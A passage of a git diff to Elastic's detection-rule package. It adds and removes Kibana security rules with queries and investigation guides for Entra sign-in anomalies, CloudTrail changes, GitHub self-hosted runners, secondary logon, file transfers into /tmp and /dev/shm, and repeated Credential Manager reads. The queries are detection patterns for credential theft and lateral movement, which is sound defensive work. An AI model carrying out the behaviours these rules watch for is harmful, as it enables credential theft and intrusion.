values(azure.signinlogs.properties.authentication_requirement),\n Esql.azure_signinlogs_properties_tenant_id = values(azure.tenant_id),\n Esql.azure_signinlogs_properties_status_error_code_values = values(azure.signinlogs.properties.status.error_code),\n Esql.message_values = values(message),\n Esql.azure_signinlogs_properties_resource_id_values = values(azure.signinlogs.properties.resource_id),\n Esql.source_ip_values = VALUES(source.ip) by azure.signinlogs.properties.session_id, azure.signinlogs.identity\n\n| where Esql.is_interactive >= 2 and Esql.is_non_interactive >= 1 and (Esql.source_ip_count_distinct >= 2 or Esql.user_agent_count_distinct >= 2)\n| keep\n Esql.*,\n azure.signinlogs.properties.session_id,\n azure.signinlogs.identity\n", + "references": [ + "https://learn.microsoft.com/en-us/entra/identity/", + "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins", + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema", + "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/", + "https://www.wiz.io/blog/recent-oauth-attacks-detection-strategies" + ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.22.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.azure_signinlogs_properties_auth_requirement_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.azure_signinlogs_properties_client_app_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.azure_signinlogs_properties_resource_display_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.azure_signinlogs_properties_resource_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.azure_signinlogs_properties_status_error_code_values", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.azure_signinlogs_properties_tenant_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.count_logon", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.is_interactive", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.is_non_interactive", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.message_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.source_ip_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.source_ip_values", + "type": "ip" + }, + { + "ecs": false, + "name": "Esql.timestamp_values", + "type": "date" + }, + { + "ecs": false, + "name": "Esql.user_agent_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.user_agent_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.identity", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.session_id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3db029b3-fbb7-4697-ad07-33cbfd5bd080", + "setup": "#### Required Azure Entra Sign-In Logs\nThis rule requires the Azure logs integration be enabled and configured to collect all logs, including sign-in logs from Entra. In Entra, sign-in logs must be enabled and streaming to the Event Hub used for the Azure logs integration.\n", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Entra ID", + "Data Source: Entra ID Sign-in", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1528", + "name": "Steal Application Access Token", + "reference": "https://attack.mitre.org/techniques/T1528/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 1 + }, + "id": "3db029b3-fbb7-4697-ad07-33cbfd5bd080_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_209.json b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_209.json deleted file mode 100644 index 4308d3829fa..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_209.json +++ /dev/null @@ -1,112 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies an update to an AWS log trail setting that specifies the delivery of log files.", - "false_positives": [ - "Trail updates may be made by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Trail updates from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS CloudTrail Log Updated", - "note": "## Triage and analysis\n\n### Investigating AWS CloudTrail Log Updated\n\nAmazon CloudTrail is a service that enables governance, compliance, operational auditing, and risk auditing of your Amazon Web Services account. With CloudTrail, you can log, continuously monitor, and retain account activity related to actions across your Amazon Web Services infrastructure. CloudTrail provides event history of your Amazon Web Services account activity, including actions taken through the Amazon Management Console, Amazon SDKs, command line tools, and other Amazon Web Services services. This event history simplifies security analysis, resource change tracking, and troubleshooting.\n\nThis rule identifies a modification on CloudTrail settings using the API `UpdateTrail` action. Attackers can do this to cover their tracks and impact security monitoring that relies on this source.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the response elements of the event to determine the scope of the changes.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:UpdateTrail and event.outcome:success\n", - "references": [ - "https://docs.aws.amazon.com/awscloudtrail/latest/APIReference/API_UpdateTrail.html", - "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "3e002465-876f-4f04-b016-84ef48ce7e5d", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS Cloudtrail", - "Use Case: Log Auditing", - "Resources: Investigation Guide", - "Tactic: Impact" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1565", - "name": "Data Manipulation", - "reference": "https://attack.mitre.org/techniques/T1565/", - "subtechnique": [ - { - "id": "T1565.001", - "name": "Stored Data Manipulation", - "reference": "https://attack.mitre.org/techniques/T1565/001/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": "Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1530", - "name": "Data from Cloud Storage", - "reference": "https://attack.mitre.org/techniques/T1530/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 209 - }, - "id": "3e002465-876f-4f04-b016-84ef48ce7e5d_209", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e528511-7316-4a6e-83da-61b5f1c07fd4_1.json b/packages/security_detection_engine/kibana/security_rule/3e528511-7316-4a6e-83da-61b5f1c07fd4_1.json deleted file mode 100644 index 1b2cc8e0acb..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/3e528511-7316-4a6e-83da-61b5f1c07fd4_1.json +++ /dev/null @@ -1,95 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects the creation of a file in a world-writeable directory through a service that is commonly used for file transfer. This behavior is often associated with lateral movement and can be an indicator of an attacker attempting to move laterally within a network.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.file*", - "auditbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Remote File Creation in World Writeable Directory", - "query": "file where host.os.type == \"linux\" and event.action == \"creation\" and\nprocess.name in (\"scp\", \"sshd\", \"ssh\", \"ftp\", \"sftp\", \"vsftpd\", \"sftp-server\", \"rsync\") and\nfile.path like~ (\"/tmp*\", \"/var/tmp*\", \"/dev/shm/*\", \"/home/.*\") and user.id != \"0\"\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "3e528511-7316-4a6e-83da-61b5f1c07fd4", - "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1021", - "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/", - "subtechnique": [ - { - "id": "T1021.004", - "name": "SSH", - "reference": "https://attack.mitre.org/techniques/T1021/004/" - } - ] - }, - { - "id": "T1570", - "name": "Lateral Tool Transfer", - "reference": "https://attack.mitre.org/techniques/T1570/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 1 - }, - "id": "3e528511-7316-4a6e-83da-61b5f1c07fd4_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/40c34c8a-b0bc-43bc-83aa-d2b76bf129e1_1.json b/packages/security_detection_engine/kibana/security_rule/40c34c8a-b0bc-43bc-83aa-d2b76bf129e1_1.json new file mode 100644 index 00000000000..17253597f1a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/40c34c8a-b0bc-43bc-83aa-d2b76bf129e1_1.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the creation of a self-hosted Github runner from a first time seen user.name in the last 5 days. Adversaries may abuse self-hosted runners to execute workflow jobs on customer infrastructure.", + "false_positives": [ + "Authorized self-hosted GitHub actions runner." + ], + "from": "now-9m", + "history_window_start": "now-5d", + "index": [ + "logs-github.audit-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "New GitHub Self Hosted Action Runner", + "new_terms_fields": [ + "user.name", + "github.actor_ip" + ], + "note": "## Triage and analysis\n\n### Investigating New GitHub Self Hosted Action Runner\n\nAdversaries who gain the ability to modify or trigger workflows in a linked GitHub repository can execute arbitrary commands on the runner host.\n\n### Possible investigation steps\n\n- Validate the user is authoried to perform this change\n- Review the purpose of the self-hosted action runner and what actions will be executed.\n- Verify if there is any adjascent sensitive file access or collection.\n- Correlate with other alerts and investiguate if this activity is related to a supply chain attack.\n\n### False positive analysis\n\n- Authorized github self-hosted actions runner.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized command execution and potential lateral movement.\n- Terminate any suspicious child processes that were initiated by the Github actions runner.\n- Conduct a thorough review of the affected system's logs and configurations to identify any unauthorized changes or additional indicators of compromise.\n- Restore the system from a known good backup if any unauthorized changes or malicious activities are confirmed.\n- Implement application whitelisting to prevent unauthorized execution.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the broader network.", + "query": "event.dataset:\"github.audit\" and event.category:\"configuration\" and event.action:\"enterprise.register_self_hosted_runner\"\n", + "references": [ + "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise", + "https://socket.dev/blog/shai-hulud-strikes-again-v2" + ], + "related_integrations": [ + { + "package": "github", + "version": "^2.4.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "40c34c8a-b0bc-43bc-83aa-d2b76bf129e1", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Github", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "40c34c8a-b0bc-43bc-83aa-d2b76bf129e1_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/40fe11c2-376e-11f0-9a82-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/40fe11c2-376e-11f0-9a82-f661ea17fbcd_1.json index 3b239472c68..8480925471c 100644 --- a/packages/security_detection_engine/kibana/security_rule/40fe11c2-376e-11f0-9a82-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/40fe11c2-376e-11f0-9a82-f661ea17fbcd_1.json @@ -28,7 +28,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_112.json b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_112.json deleted file mode 100644 index 96f5b430976..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_112.json +++ /dev/null @@ -1,124 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies process creation with alternate credentials. Adversaries may create a new process with a different token to escalate privileges and bypass access controls.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Process Creation via Secondary Logon", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Process Creation via Secondary Logon\n\nThe Secondary Logon service in Windows allows users to run processes with different credentials, facilitating legitimate administrative tasks. However, adversaries can exploit this to escalate privileges by creating processes with alternate tokens, bypassing access controls. The detection rule identifies such abuse by monitoring successful logins via the Secondary Logon service and subsequent process creation, linking them through unique logon identifiers.\n\n### Possible investigation steps\n\n- Review the event logs for the specific TargetLogonId to identify the user account associated with the process creation and verify if the account is authorized to use alternate credentials.\n- Examine the source IP address \"::1\" to confirm if the process creation originated from the local machine, which might indicate a local privilege escalation attempt.\n- Investigate the process name \"svchost.exe\" to determine if it is being used legitimately or if it has been exploited for malicious purposes, such as running unauthorized services.\n- Check the sequence of events within the 1-minute maxspan to identify any unusual or suspicious activities that occurred immediately before or after the process creation.\n- Correlate the detected activity with other security alerts or logs to identify any patterns or additional indicators of compromise that might suggest a broader attack campaign.\n\n### False positive analysis\n\n- Legitimate administrative tasks using the Secondary Logon service can trigger alerts. To manage this, identify and whitelist specific administrative accounts or tasks that frequently use this service for legitimate purposes.\n- Scheduled tasks or automated scripts that use alternate credentials for routine operations may cause false positives. Review and exclude these tasks by creating exceptions for known scripts or scheduled jobs.\n- Internal IT support activities often involve using alternate credentials for troubleshooting or maintenance. Document and exclude these activities by maintaining a list of support personnel and their typical actions.\n- Software updates or installations that require elevated privileges might be flagged. Monitor and exclude these processes by identifying and documenting the update mechanisms used within the organization.\n- Development or testing environments where alternate credentials are used for testing purposes can generate alerts. Exclude these environments by setting up specific rules that recognize and ignore these non-production activities.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary.\n- Terminate any suspicious processes identified as being created via the Secondary Logon service, especially those linked to the unique logon identifiers from the alert.\n- Review and revoke any alternate credentials or tokens used in the suspicious process creation to prevent further misuse.\n- Conduct a thorough examination of the affected system for additional signs of compromise, such as unauthorized user accounts or changes to system configurations.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine the full scope of the breach.\n- Implement stricter access controls and monitoring on the Secondary Logon service to detect and prevent similar privilege escalation attempts in the future.\n- Update and reinforce endpoint detection and response (EDR) solutions to enhance monitoring of process creation events and logon activities, ensuring they are aligned with the latest threat intelligence.", - "query": "sequence by winlog.computer_name with maxspan=1m\n\n[authentication where event.action:\"logged-in\" and\n event.outcome == \"success\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and\n\n /* seclogon service */\n process.name == \"svchost.exe\" and\n winlog.event_data.LogonProcessName : \"seclogo*\" and source.ip == \"::1\" ] by winlog.event_data.TargetLogonId\n\n[process where event.type == \"start\"] by winlog.event_data.TargetLogonId\n", - "references": [ - "https://attack.mitre.org/techniques/T1134/002/" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.computer_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.LogonProcessName", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.TargetLogonId", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "42eeee3d-947f-46d3-a14d-7036b962c266", - "setup": "## Setup\n\nAudit events 4624 and 4688 are needed to trigger this rule.\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1134", - "name": "Access Token Manipulation", - "reference": "https://attack.mitre.org/techniques/T1134/", - "subtechnique": [ - { - "id": "T1134.002", - "name": "Create Process with Token", - "reference": "https://attack.mitre.org/techniques/T1134/002/" - }, - { - "id": "T1134.003", - "name": "Make and Impersonate Token", - "reference": "https://attack.mitre.org/techniques/T1134/003/" - } - ] - } - ] - } - ], - "type": "eql", - "version": 112 - }, - "id": "42eeee3d-947f-46d3-a14d-7036b962c266_112", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_113.json b/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_113.json deleted file mode 100644 index b5b76e9691f..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/44fc462c-1159-4fa8-b1b7-9b6296ab4f96_113.json +++ /dev/null @@ -1,109 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Windows Credential Manager allows you to create, view, or delete saved credentials for signing into websites, connected applications, and networks. An adversary may abuse this to list or dump credentials stored in the Credential Manager for saved usernames and passwords. This may also be performed in preparation of lateral movement.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Multiple Vault Web Credentials Read", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Multiple Vault Web Credentials Read\n\nWindows Credential Manager stores credentials for web logins, apps, and networks, facilitating seamless user access. Adversaries exploit this by extracting stored credentials, potentially aiding lateral movement within networks. The detection rule identifies suspicious activity by flagging consecutive credential reads from the same process, excluding benign actions like localhost access, thus highlighting potential credential dumping attempts.\n\n### Possible investigation steps\n\n- Review the process associated with the flagged PID to determine if it is a legitimate application or potentially malicious. Check for known software or unusual executables.\n- Investigate the source and destination of the web credentials read by examining the winlog.event_data.Resource field to identify any suspicious or unexpected URLs.\n- Check the winlog.computer_name to identify the affected system and assess whether it is a high-value target or has been involved in previous suspicious activities.\n- Analyze the timeline of events around the alert to identify any preceding or subsequent suspicious activities that may indicate a broader attack pattern.\n- Verify the user context by examining the winlog.event_data.SubjectLogonId to ensure the activity was not performed by a privileged or administrative account without proper authorization.\n- Cross-reference the event with other security logs or alerts to identify any correlated activities that might suggest a coordinated attack or compromise.\n\n### False positive analysis\n\n- Localhost access is a common false positive since the rule excludes localhost reads. Ensure that any legitimate applications accessing credentials via localhost are properly whitelisted to prevent unnecessary alerts.\n- Automated scripts or applications that frequently access web credentials for legitimate purposes may trigger the rule. Identify these processes and create exceptions for them to reduce noise.\n- System maintenance or updates might involve credential reads that are benign. Coordinate with IT teams to schedule these activities and temporarily adjust the rule sensitivity or add exceptions during these periods.\n- Security tools or monitoring software that perform regular checks on credential integrity could be flagged. Verify these tools and add them to an exception list if they are part of the organization's security infrastructure.\n- User behavior such as frequent password changes or credential updates might cause alerts. Educate users on the impact of their actions and consider adjusting the rule to accommodate expected behavior patterns.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent potential lateral movement by the adversary.\n- Terminate the suspicious process identified by the process ID (pid) involved in the credential reads to stop further credential access.\n- Conduct a thorough review of the affected system for any additional signs of compromise, such as unauthorized user accounts or scheduled tasks.\n- Change passwords for any accounts that may have been exposed, focusing on those stored in the Windows Credential Manager.\n- Implement network segmentation to limit access to critical systems and data, reducing the risk of lateral movement.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine the scope of the breach.\n- Enhance monitoring and logging on the affected system and similar endpoints to detect any future attempts at credential dumping or unauthorized access.", - "query": "sequence by winlog.computer_name, winlog.process.pid with maxspan=1s\n\n /* 2 consecutive vault reads from same pid for web creds */\n\n [any where event.code : \"5382\" and\n (winlog.event_data.SchemaFriendlyName : \"Windows Web Password Credential\" and winlog.event_data.Resource : \"http*\") and\n not winlog.event_data.SubjectLogonId : \"0x3e7\" and\n not winlog.event_data.Resource : \"http://localhost/\"]\n\n [any where event.code : \"5382\" and\n (winlog.event_data.SchemaFriendlyName : \"Windows Web Password Credential\" and winlog.event_data.Resource : \"http*\") and\n not winlog.event_data.SubjectLogonId : \"0x3e7\" and\n not winlog.event_data.Resource : \"http://localhost/\"]\n", - "references": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=5382", - "https://www.elastic.co/security-labs/detect-credential-access" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.computer_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.Resource", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.SchemaFriendlyName", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.SubjectLogonId", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.process.pid", - "type": "long" - } - ], - "risk_score": 47, - "rule_id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1003", - "name": "OS Credential Dumping", - "reference": "https://attack.mitre.org/techniques/T1003/" - }, - { - "id": "T1555", - "name": "Credentials from Password Stores", - "reference": "https://attack.mitre.org/techniques/T1555/", - "subtechnique": [ - { - "id": "T1555.004", - "name": "Windows Credential Manager", - "reference": "https://attack.mitre.org/techniques/T1555/004/" - } - ] - } - ] - } - ], - "type": "eql", - "version": 113 - }, - "id": "44fc462c-1159-4fa8-b1b7-9b6296ab4f96_113", - "type": "security-rule" -} \ No newline at end of file diff --git 